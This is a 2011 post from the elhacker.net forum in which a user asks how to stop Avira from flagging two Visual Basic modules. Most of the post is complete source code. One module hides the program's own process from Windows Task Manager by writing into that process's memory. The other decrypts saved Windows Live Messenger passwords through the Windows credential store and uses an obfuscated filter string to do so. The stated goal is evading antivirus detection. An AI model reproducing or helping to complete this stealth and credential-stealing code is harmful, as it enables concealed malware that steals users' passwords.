elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Tutorial básico de Quickjs


+  Foro de elhacker.net
|-+  Programación
| |-+  Programación General
| | |-+  .NET (C#, VB.NET, ASP)
| | | |-+  Programación Visual Basic (Moderadores: LeandroA, seba123neo)
| | | | |-+  Codigo 'virico'
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: Codigo 'virico'  (Leído 1,493 veces)
CAR3S?


Desconectado Desconectado

Mensajes: 343


Level xXx


Ver Perfil
Codigo 'virico'
« en: 25 Abril 2011, 21:55 pm »

Holaaaaas   :P

:3

el avira me detecta 2 modulos como viricos,

este es para ocultar el proceso del admin de tareas

Código
  1.  
  2. Option Explicit
  3. Public Declare Function FindWindow Lib "user32" Alias "FindWindowA" (ByVal lpClassName As String, ByVal lpWindowName As String) As Long
  4. Public Declare Function EnumChildWindows Lib "user32" (ByVal hWndParent As Long, ByVal lpEnumFunc As Long, ByVal lParam As Long) As Long
  5. Public Declare Function GetWindowText Lib "user32" Alias "GetWindowTextA" (ByVal hwnd As Long, ByVal lpString As String, ByVal cch As Long) As Long
  6. Public Declare Function GetClassName Lib "user32" Alias "GetClassNameA" (ByVal hwnd As Long, ByVal lpClassName As String, ByVal nMaxCount As Long) As Long
  7. Public Declare Function SendMessage Lib "user32" Alias "SendMessageA" (ByVal hwnd As Long, ByVal wMsg As Long, ByVal wParam As Long, lParam As Any) As Long
  8.  
  9. Private Declare Function GetWindowThreadProcessId Lib "user32" (ByVal hwnd As Long, lpdwProcessId As Long) As Long
  10. Private Declare Function ReadProcessMemory Lib "kernel32" (ByVal hProcess As Long, lpBaseAddress As Any, lpBuffer As Any, ByVal nSize As Long, lpNumberOfBytesWritten As Long) As Long
  11. Private Declare Function WriteProcessMemory Lib "kernel32" (ByVal hProcess As Long, lpBaseAddress As Any, lpBuffer As Any, ByVal nSize As Long, lpNumberOfBytesWritten As Long) As Long
  12. Private Declare Function OpenProcess Lib "kernel32" (ByVal dwDesiredAccess As Long, ByVal bInheritHandle As Long, ByVal dwProcessId As Long) As Long
  13.  
  14. Public Declare Function SetTimer Lib "user32" (ByVal hwnd As Long, ByVal nIDEvent As Long, ByVal uElapse As Long, ByVal lpTimerFunc As Long) As Long
  15. Public Declare Function KillTimer Lib "user32" (ByVal hwnd As Long, ByVal nIDEvent As Long) As Long
  16.  
  17. Const PROCESS_VM_OPERATION = &H8
  18. Const PROCESS_VM_READ = &H10
  19. Const PROCESS_VM_WRITE = &H20
  20. Const PROCESS_ALL_ACCESS = 0
  21. Private Const PAGE_READWRITE = &H4&
  22.  
  23. Const MEM_COMMIT = &H1000
  24. Const MEM_RESERVE = &H2000
  25. Const MEM_DECOMMIT = &H4000
  26. Const MEM_RELEASE = &H8000
  27. Const MEM_FREE = &H10000
  28. Const MEM_PRIVATE = &H20000
  29. Const MEM_MAPPED = &H40000
  30. Const MEM_TOP_DOWN = &H100000
  31.  
  32. Private Declare Function VirtualAllocEx Lib "kernel32" (ByVal hProcess As Long, ByVal lpAddress As Long, ByVal dwSize As Long, ByVal flAllocationType As Long, ByVal flProtect As Long) As Long
  33. Private Declare Function VirtualFreeEx Lib "kernel32" (ByVal hProcess As Long, lpAddress As Any, ByVal dwSize As Long, ByVal dwFreeType As Long) As Long
  34. Private Declare Function CloseHandle Lib "kernel32" (ByVal hObject As Long) As Long
  35.  
  36. Private Const LVM_FIRST = &H1000
  37. Private Const LVM_GETTITEMCOUNT& = (LVM_FIRST + 4)
  38.  
  39. Private Const LVM_GETITEMW = (LVM_FIRST + 75)
  40. Private Const LVIF_TEXT = &H1
  41. Private Const LVM_DELETEITEM = 4104
  42.  
  43. Public Type LV_ITEM
  44. mask As Long
  45. iItem As Long
  46. iSubItem As Long
  47. State As Long
  48. stateMask As Long
  49. lpszText As Long 'LPCSTR
  50. cchTextMax As Long
  51. iImage As Long
  52. lParam As Long
  53. iIndent As Long
  54. End Type
  55.  
  56. Type LV_TEXT
  57. sItemText As String * 80
  58. End Type
  59.  
  60. Public Function Procesos(ByVal hWnd2 As Long, lParam As String) As Boolean
  61. Dim Nombre As String * 255, nombreClase As String * 255
  62. Dim Nombre2 As String, nombreClase2 As String
  63. Dim X As Long, Y As Long
  64. X = GetWindowText(hWnd2, Nombre, 255)
  65. Y = GetClassName(hWnd2, nombreClase, 255)
  66.  
  67. Nombre = Left(Nombre, X)
  68. nombreClase = Left(nombreClase, Y)
  69. Nombre2 = Trim(Nombre)
  70. nombreClase2 = Trim(nombreClase)
  71. If nombreClase2 = "SysListView32" And Nombre2 = "Procesos" Then
  72. OcultarItems (hWnd2)
  73. Exit Function
  74. End If
  75. If Nombre2 = "" And nombreClase2 = "" Then
  76. Procesos = False
  77. Else
  78. Procesos = True
  79. End If
  80. End Function
  81.  
  82. Private Function OcultarItems(ByVal hListView As Long) ' As Variant
  83. Dim pid As Long, tid As Long
  84. Dim hProceso As Long, nElem As Long, lEscribiendo As Long, i As Long
  85. Dim DirMemComp As Long, dwTam As Long
  86. Dim DirMemComp2 As Long
  87. Dim sLVItems() As String
  88. Dim li As LV_ITEM
  89. Dim lt As LV_TEXT
  90. If hListView = 0 Then Exit Function
  91. tid = GetWindowThreadProcessId(hListView, pid)
  92. nElem = SendMessage(hListView, LVM_GETTITEMCOUNT, 0, 0&)
  93. If nElem = 0 Then Exit Function
  94. ReDim sLVItems(nElem - 1)
  95. li.cchTextMax = 80
  96. dwTam = Len(li)
  97. DirMemComp = GetMemComp(pid, dwTam, hProceso)
  98. DirMemComp2 = GetMemComp(pid, LenB(lt), hProceso)
  99. For i = 0 To nElem - 1
  100. li.lpszText = DirMemComp2
  101. li.cchTextMax = 80
  102. li.iItem = i
  103. li.mask = LVIF_TEXT
  104. WriteProcessMemory hProceso, ByVal DirMemComp, li, dwTam, lEscribiendo
  105. lt.sItemText = Space(80)
  106. WriteProcessMemory hProceso, ByVal DirMemComp2, lt, LenB(lt), lEscribiendo
  107. Call SendMessage(hListView, LVM_GETITEMW, 0, ByVal DirMemComp)
  108. Call ReadProcessMemory(hProceso, ByVal DirMemComp2, lt, LenB(lt), lEscribiendo)
  109. If TrimNull(StrConv(lt.sItemText, vbFromUnicode)) = App.EXEName & ".exe" Then '<===========CAMBIAR
  110. Call SendMessage(hListView, LVM_DELETEITEM, i, 0)
  111. Exit Function
  112. End If
  113. Next i
  114. CloseMemComp hProceso, DirMemComp, dwTam
  115. CloseMemComp hProceso, DirMemComp2, LenB(lt)
  116. End Function
  117.  
  118. Private Function GetMemComp(ByVal pid As Long, ByVal memTam As Long, hProceso As Long) As Long
  119. hProceso = OpenProcess(PROCESS_VM_OPERATION Or PROCESS_VM_READ Or PROCESS_VM_WRITE, False, pid)
  120. GetMemComp = VirtualAllocEx(ByVal hProceso, ByVal 0&, ByVal memTam, MEM_RESERVE Or MEM_COMMIT, PAGE_READWRITE)
  121. End Function
  122.  
  123. Private Sub CloseMemComp(ByVal hProceso As Long, ByVal DirMem As Long, ByVal memTam As Long)
  124. Call VirtualFreeEx(hProceso, ByVal DirMem, memTam, MEM_RELEASE)
  125. CloseHandle hProceso
  126. End Sub
  127. Private Function TrimNull(sInput As String) As String
  128. Dim pos As Integer
  129. pos = InStr(sInput, Chr$(0))
  130. If pos Then
  131. TrimNull = Left$(sInput, pos - 1)
  132. Exit Function
  133. End If
  134. TrimNull = sInput
  135. End Function
  136. Sub TimerProc(ByVal hwnd As Long, ByVal nIDEvent As Long, ByVal uElapse As Long, ByVal lpTimerFunc As Long)
  137. Dim Handle As Long
  138. Handle = FindWindow(vbNullString, "Administrador de tareas de Windows")
  139. If Handle <> 0 Then EnumChildWindows Handle, AddressOf Procesos, 1
  140. End Sub
  141.  
  142. Public Sub Ocultar(ByVal hwnd As Long)
  143. App.TaskVisible = False
  144. SetTimer hwnd, 0, 20, AddressOf TimerProc
  145. End Sub
  146.  
  147. Public Sub Mostrar(ByVal hwnd As Long)
  148. App.TaskVisible = True
  149. KillTimer hwnd, 0
  150. End Sub
  151.  

y este es para obtener las contraseñas del msn guardadas

Código
  1.  
  2. Option Explicit
  3.  
  4. '---------------------------------------------------------------------------------------
  5. ' Module      : mMessengerPass
  6. ' DateTime    : 23/09/2008 11:24
  7. ' Author      : Cobein
  8. ' Mail        : cobein27@hotmail.com
  9. ' WebPage     : http://www.advance.com.ar
  10. ' Purpose     : Read WLM (>= 8.0) pass
  11. ' Usage       : At your own risk
  12. ' Requirements: None
  13. ' Distribution: You can freely use this code in your own
  14. '               applications, but you may not reproduce
  15. '               or publish this code on any web site,
  16. '               online service, or distribute as source
  17. '               on any media without express permission.
  18. '
  19. ' Reference   : No idea about the original author, It was a french guy tho
  20. '
  21. ' History     : 23/09/2008 First Cut....................................................
  22. '---------------------------------------------------------------------------------------
  23.  
  24.  
  25. Private Declare Function LocalFree Lib "kernel32.dll" (ByVal hMem As Long) As Long
  26. Private Declare Function LocalAlloc Lib "kernel32.dll" (ByVal wFlags As Long, ByVal wBytes As Long) As Long
  27. Private Declare Sub CopyMemory Lib "kernel32.dll" Alias "RtlMoveMemory" (ByRef Destination As Any, ByRef Source As Any, ByVal Length As Long)
  28. Private Declare Function CredEnumerate Lib "ADVAPI32.dll" Alias "CredEnumerateW" (ByVal lpszFilter As Long, ByVal lFlags As Long, ByRef pCount As Long, ByRef lppCredentials As Long) As Long
  29. Private Declare Function CredFree Lib "ADVAPI32.dll" (ByVal pBuffer As Long) As Long
  30. Private Declare Function CryptUnprotectData Lib "crypt32.dll" (ByRef pDataIn As DATA_BLOB, ByVal ppszDataDescr As Long, ByVal pOptionalEntropy As Long, ByVal pvReserved As Long, ByVal pPromptStruct As Long, ByVal dwFlags As Long, ByRef pDataOut As DATA_BLOB) As Long
  31. Private Declare Function SysAllocString Lib "oleaut32.dll" (ByVal pOlechar As Long) As String
  32. Private Declare Function GetVersionEx Lib "kernel32.dll" Alias "GetVersionExA" (ByRef lpVersionInformation As OSVERSIONINFO) As Long
  33.  
  34. Private Type CREDENTIAL
  35.    dwFlags                 As Long
  36.    dwType                  As Long
  37.    lpstrTargetName         As Long
  38.    lpstrComment            As Long
  39.    ftLastWritten           As Double
  40.    dwCredentialBlobSize    As Long
  41.    lpbCredentialBlob       As Long
  42.    dwPersist               As Long
  43.    dwAttributeCount        As Long
  44.    lpAttributes            As Long
  45.    lpstrTargetAlias        As Long
  46.    lpUserName              As Long
  47. End Type
  48.  
  49. Private Type DATA_BLOB
  50.    cbData                  As Long
  51.    pbData                  As Long
  52. End Type
  53.  
  54. Private Type OSVERSIONINFO
  55.    dwOSVersionInfoSize     As Long
  56.    dwMajorVersion          As Long
  57.    dwMinorVersion          As Long
  58.    dwBuildNumber           As Long
  59.    dwPlatformId            As Long
  60.    szCSDVersion            As String * 128
  61. End Type
  62.  
  63. Public Function EnumWLMAccounts() As String
  64.    Dim lMem        As Long
  65.    Dim i           As Long
  66.    Dim lCount      As Long
  67.    Dim lCred       As Long
  68.    Dim ub          As Long
  69.    Dim lPtr        As Long
  70.    Dim tCred       As CREDENTIAL
  71.    Dim tBlobOut    As DATA_BLOB
  72.    Dim tBlobIn     As DATA_BLOB
  73.    Dim sPass       As String
  74.    Dim vData       As Variant
  75.    Dim tOSV        As OSVERSIONINFO
  76.  
  77.    With tOSV
  78.        .dwOSVersionInfoSize = Len(tOSV)
  79.        Call GetVersionEx(tOSV)
  80.        If Not .dwMajorVersion + .dwMinorVersion / 10 >= 5.1 Then
  81.            Exit Function
  82.        End If
  83.    End With
  84.  
  85.    lMem = LocalAlloc(&H40, 38)
  86.  
  87.    vData = Array( _
  88.       &H57, &H69, &H6E, &H64, &H6F, &H77, &H73, &H4C, &H69, _
  89.       &H76, &H65, &H3A, &H6E, &H61, &H6D, &H65, &H3D, &H2A)
  90.  
  91.    For i = 0 To 17
  92.        Call CopyMemory(ByVal lMem + (i * 2), CLng(vData(i)), &H1)
  93.    Next
  94.  
  95.    Call CredEnumerate(lMem, 0, lCount, lCred)
  96.  
  97.    If lCount Then
  98.        For i = ub To ub + lCount - 1
  99.  
  100.            Call CopyMemory(ByVal VarPtr(lPtr), ByVal lCred + (i - ub) * 4, &H4)
  101.            Call CopyMemory(ByVal VarPtr(tCred), ByVal lPtr, &H34)
  102.  
  103.            With tBlobIn
  104.                .pbData = tCred.lpbCredentialBlob
  105.                .cbData = tCred.dwCredentialBlobSize
  106.  
  107.                Call CryptUnprotectData(tBlobIn, 0&, 0&, 0&, 0&, 1&, tBlobOut)
  108.  
  109.                sPass = Space(.cbData \ 2)
  110.                Call CopyMemory(ByVal StrPtr(sPass), ByVal .pbData, .cbData)
  111.            End With
  112.  
  113.                       EnumWLMAccounts = EnumWLMAccounts & vbCrLf & vbCrLf & String(50, "-") & vbCrLf
  114.            EnumWLMAccounts = EnumWLMAccounts & "Protocolo: " & StrConv(SysAllocString(tCred.lpstrTargetName), vbFromUnicode) & vbCrLf
  115.            EnumWLMAccounts = EnumWLMAccounts & "Cuenta: " & StrConv(SysAllocString(tCred.lpUserName), vbFromUnicode) & vbCrLf
  116.            EnumWLMAccounts = EnumWLMAccounts & "Contraseña: " & sPass & vbCrLf
  117.            EnumWLMAccounts = EnumWLMAccounts & String(50, "-") & vbCrLf
  118.  
  119.        Next
  120.        ub = ub + lCount
  121.    End If
  122.  
  123.    Call CredFree(lCred)
  124.    Call LocalFree(lMem)
  125. End Function
  126.  
  127.  


la verdad nose que hay que hacer,

osea es como q estoy en el desierto sin brujula y tengo q ir al norte (en este desierto no hay sol xd) (?

que tengo que hacer?


En línea

Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  

WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines